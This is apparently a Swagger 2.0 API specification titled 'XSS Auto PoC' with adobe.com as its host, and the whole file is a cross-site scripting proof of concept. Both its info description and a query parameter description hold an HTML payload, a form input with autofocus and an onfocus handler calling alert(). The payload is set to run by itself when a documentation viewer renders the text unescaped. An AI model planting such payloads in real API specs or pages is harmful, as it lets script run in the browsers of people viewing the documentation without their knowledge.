swagger: "2.0"
info:
  title: XSS Auto PoC
  description: |
    <form><input autofocus onfocus=alert('XSS Adobe Autofocus')></form>
  version: "1.0"
host: adobe.com
basePath: /
schemes:
  - https
paths:
  /autoxss:
    get:
      tags:
        - xss
      summary: Autofocus XSS Trigger
      parameters:
        - name: auto
          in: query
          required: false
          type: string
          description: |
            <form><input autofocus onfocus=alert('XSS From Param')></form>
      responses:
        '200':
          description: OK
